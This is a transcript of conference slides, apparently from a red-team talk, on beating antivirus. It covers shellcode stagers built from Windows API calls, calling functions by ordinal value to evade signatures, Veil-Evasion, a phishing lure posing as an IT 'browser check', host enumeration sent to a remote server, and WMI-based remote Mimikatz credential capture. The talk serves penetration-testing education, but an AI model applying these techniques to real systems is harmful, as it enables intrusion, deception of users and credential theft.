A Battle Against the Industry - Beating Antivirus for Meterpreter and More
Transcript of A Battle Against the Industry - Beating Antivirus for Meterpreter and More
![Page 1: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/1.jpg)
A Battle Against the Industry - Beating
Antivirus for Meterpreter and More
@ChrisTruncer
![Page 2: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/2.jpg)
Whoami■ A systems administrator turned red teamer■ Florida State Seminole■ Open Source Software Developer
■ Veil-Framework■ EyeWitness
Thanks Robin :)■ Egress-Assess■ Just-Metadata
![Page 3: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/3.jpg)
Why am I here today?
■Share some laughs at Antivirus :)■Give a background on stagers■Showcase a Veil-Evasion signature bypass■Anyone can do this..
■Talk about developing your own code■Case studies on previously developed code
![Page 4: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/4.jpg)
Stagers
![Page 5: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/5.jpg)
What are stagers?
■Can be referred to as “stage 1”■Might be msfvenom, Veil-Evasion, etc. output
■Goal is typically to inject shellcode into memory■Shellcode usually downloads and executes a
reflectively injectable dll■…but it can also do anything you want if you
write it :)
![Page 6: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/6.jpg)
What are stagers?
■Stagers are really used as loaders for your real malware■They’re designed to be expendable and tiny■Don’t give away your engineered malware by
dropping it to disk■Load everything in memory
![Page 7: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/7.jpg)
What are stagers?
■Any language that has the ability to access windows functions can be used to write a stager!■Pretty cool, and allows us to expand out from
traditional “Windows Langauges”■Interacting with Windows functions can seem
daunting, but isn’t all that bad■4 or 5 function calls
![Page 8: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/8.jpg)
Function Calls
![Page 9: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/9.jpg)
Stagers in a Nutshell
■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory■ Create a thread to run the shellcode copied into
the process’s memory■ Wait for the thread to complete running before
exiting the program
![Page 10: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/10.jpg)
Windows API Calls
■Most stagers utilize VirtualAlloc to allocate memory
■This talk shows an alternate way to allocate memory that isn’t heavily utilized
■It might be a better way to fly under the radar
![Page 11: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/11.jpg)
HeapCreate
■Creates a private heap object that can be used by the process creating the heap■Specify the memory protections■Requires the size of the heap that will need to be
allocated■Shellcode length
■Max size of allocated memory■I do twice the shellcode length
![Page 12: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/12.jpg)
HeapAlloc
■ Allocates memory from the previously created heap object
■ Receives a handle to the previously allocated heap object
■ Specify the total amount of space that you are allocating for shellcode
![Page 13: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/13.jpg)
RtlMoveMemory
■Places the shellcode you are injecting into the allocated heap space
■Needs a pointer to where data (shellcode) will be copied to (heapalloc output)
■Needs a pointer to the data (shellcode)■Needs the length of the shellcode being injected
![Page 14: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/14.jpg)
CreateThread
■This function creates a new thread within the current process to execute the data (shellcode) that was injected
■Requires a pointer to the data (shellcode) that will run in the new thread
■Schedule the thread to execute immediately
![Page 15: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/15.jpg)
WaitForSingleObject
■This function is like a blocking call to prevent the program from exiting immediately
■Requires a handle to the thread that was created by the CreateThread function
■Requires a value (-1) to specify that the program should wait to exit until the thread exists
![Page 16: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/16.jpg)
Stagers in a Nutshell (Repeated)
■ Allocate memory to store the shellcode being injected, and apply proper memory permissions
■ Copy the shellcode into the allocated memory■ Create a thread to run the shellcode copied into
the process’s memory■ Wait for the thread to complete running before
exiting the program
![Page 17: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/17.jpg)
![Page 18: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/18.jpg)
Ordinal Values
![Page 19: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/19.jpg)
Ordinal Values
■ Using ordinal values to reference functions is an old-school but effective way to bypass antivirus detection
■Picture an array or Python list containing functions. To reference a specific function, you reference it by its location within the array/list
■Same concept for bypassing AV via ordinal values
![Page 20: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/20.jpg)
Ordinal Values
■ Rather than calling HeapAlloc or RtlMoveMemory by name, why not reference it by its ordinal value?
■ This is still a call to the same function, but just via a different method
■Check out this code
![Page 21: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/21.jpg)
![Page 22: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/22.jpg)
![Page 23: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/23.jpg)
![Page 24: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/24.jpg)
Ordinal Values
■Simply referencing function calls by their ordinal value vs. name can bypass anti-virus
■NOTE: Ordinal values can change between both OSs and Service Packs. You will need to target your payload to the OS and Service Pack when referencing via ordinal value.■So…. how do we find these ordinal values?
![Page 25: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/25.jpg)
![Page 26: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/26.jpg)
Ordinal Values
■PEView is a free program which lets you inspect PE files, dlls, etc.
■You can use this to load kernel32.dll, search for the functions that you are calling, and obtain their ordinal value
■PEView provides the base 16 value, so be sure to convert it to its base 10 value.
![Page 27: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/27.jpg)
Veil’s Approach
![Page 28: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/28.jpg)
How Veil-Evasion Bypasses AV
■ Completely open sourced■ Can query VT’s API
■ Veil-Evasion attempts to bypass AV through a few different techniques
■Obfuscated Code
■Encrypted Code■Non-standard languages for binaries
Flat vs. encrypted code
![Page 29: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/29.jpg)
How Veil-Evasion Bypasses AV
■ Languages that Veil-Evasion supports■Python
■Perl
■PowerShell■C#
■C
■Go■Ruby
![Page 30: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/30.jpg)
How Veil-Evasion Bypasses AV
■Using a non-standard language (read not C, C++, or C#) resulted in payloads that immediately bypassed antivirus
■AV just didn’t understand how to properly inspect these executables
■Example:
■C Flat vs. Python Flat
![Page 31: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/31.jpg)
![Page 32: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/32.jpg)
![Page 33: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/33.jpg)
Ordinal Values
■ Simply changing the language the payload was written in completely bypassed all AV signatures.
![Page 34: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/34.jpg)
Antivirus Signature
![Page 35: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/35.jpg)
Veil-Evasion
■After about 1 year, Veil-Evasion finally had its first signature!
■I was informed about this on IRC and wanted to check it out.
![Page 36: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/36.jpg)
![Page 37: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/37.jpg)
![Page 38: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/38.jpg)
![Page 39: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/39.jpg)
![Page 40: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/40.jpg)
![Page 41: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/41.jpg)
![Page 42: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/42.jpg)
![Page 43: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/43.jpg)
Custom Code
![Page 44: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/44.jpg)
Browser Check Scenario
■Instead of sending just some random executable when phishing, what if you promise to secure their system?
■Developed by Hunter Hardman (@t3ntman)
■Written in C#■Custom code, so it bypasses every single AV out
there (at least before Hunter made it public :))
![Page 45: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/45.jpg)
![Page 46: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/46.jpg)
Browser Check Scenario
■This works great for phishing scenarios■We target individuals impersonating their IT
Security, or just IT staff■Warn them about the dangers of
misconfigured/old browsers■Give them a solution!
![Page 47: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/47.jpg)
Browser Check Scenario
■Once the program starts, it spawns PowerShell and executes any code you give it
■Meterpreter or Beacon!■It’s fully functional, once user tells it to start,
they see a progress bar go to completion.■Once complete, it lets them know their system is
secure!
![Page 48: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/48.jpg)
Browser Check Scenario
■Delivery is dependent upon the situation■We’ve created websites hosting it over HTTPS
to make users think it is secure■Created fake “secure file transfer” websites
■Rarely, we’ve sent just the executable
■For our initial access, this has been pretty successful, and the lack of AV detection helps the user trust the program
![Page 49: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/49.jpg)
Browser Check Scenario
■Currently available for review at -https://github.com/t3ntman/BrowserCheck
![Page 50: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/50.jpg)
Enumerator
![Page 51: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/51.jpg)
Enumerator
■Customer didn’t want actual shellcode injection of infection of their endpoints
■Wanted intel collection to act as proof of “compromise”
■I developed a script that would gather host information and would POST the data out over HTTPS to our server.
![Page 52: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/52.jpg)
Enumerator
■Information gathered■System hostname
■IP address(es)
■System drives and drive space■Current user
■Tasklist
![Page 53: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/53.jpg)
![Page 54: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/54.jpg)
![Page 55: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/55.jpg)
Github
■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enumeration.py
■https://github.com/ChrisTruncer/PenTestScripts/blob/master/enum_server.py
![Page 56: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/56.jpg)
WMIOps
![Page 57: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/57.jpg)
WMIOps
■Why waste engineering time, developing a RAT, hoping it never gets burnt. Just leverage built in functionality!
■Anything useful for system administration is just as easily repurposed for illegitimate use :)
■Just live off the land!
![Page 58: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/58.jpg)
WMIOps
■Used WMI much?■WMI is installed and running by default on
Windows systems since Windows 2000■It does require local admin privileges on the
targeted systemBut this can make it great for post-
exploitation
![Page 59: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/59.jpg)
WMIOps
■ WMIOps - A PowerShell based tool which uses WMI to carry out various actions on targeted systems.
■ Developed in PowerShell - we can load it in memory and execute a variety of different tasks
![Page 60: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/60.jpg)
WMIOps
■ Want to see which users have active processes on a system?
■Might be good to know where you can snag creds!
■Rather than needing to compromise the machine, just run a simple WMI query with WMIOps!
![Page 61: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/61.jpg)
![Page 62: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/62.jpg)
WMIOps
■Now that we know who is on the system, want to run Mimikatz to capture user credentials?
■Traditionally we’d have to compromise it, and load up Mimikatz.
■Why not leverage WMI to do everything in memory without needing the use of a RAT?
![Page 63: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/63.jpg)
WMIOps
■ Invoke-RemoteScriptWithOutput■Spawn PowerShell on the remote system
■Download the PowerShell script in memory
■Runs the user specified function■Saves output
■Performs a POST over HTTPS to a user specified IP address
![Page 64: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/64.jpg)
![Page 65: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/65.jpg)
![Page 66: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/66.jpg)
WMIOps
■ WMIOps can do other tasks as well■Run commands
■Kill processes
■Search for files■Transfer files
■Etc.
Available here -https://github.com/ChrisTruncer/WMIOps
![Page 67: A Battle Against the Industry - Beating Antivirus for Meterpreter and More](https://reader031.fdocuments.net/reader031/viewer/2022030221/588465841a28abbd308b5c3f/html5/thumbnails/67.jpg)
Thanks!Any questions?
Reach out to me!■ @ChrisTruncer■ [email protected]■ https://www.christophertruncer.com■ https://www.github.com/ChrisTruncer